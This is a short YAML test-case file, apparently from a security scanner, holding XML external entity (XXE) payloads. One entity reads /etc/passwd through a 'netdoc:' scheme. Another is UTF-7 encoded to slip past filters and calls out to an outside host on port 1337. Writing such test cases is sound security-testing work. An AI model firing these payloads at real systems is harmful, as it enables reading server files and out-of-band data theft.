gitex2026/AttackSurface/dist/testcases/community/community-xxe.yml
2026-04-24 19:18:37 +00:00

12 lines
387 B
YAML

payload:
- <!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY data SYSTEM "netdoc:/etc/passwd">]><foo>&data;</foo>
- !!str |
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
encoder:
- Plain
placeholder:
- XMLBody
type: XXE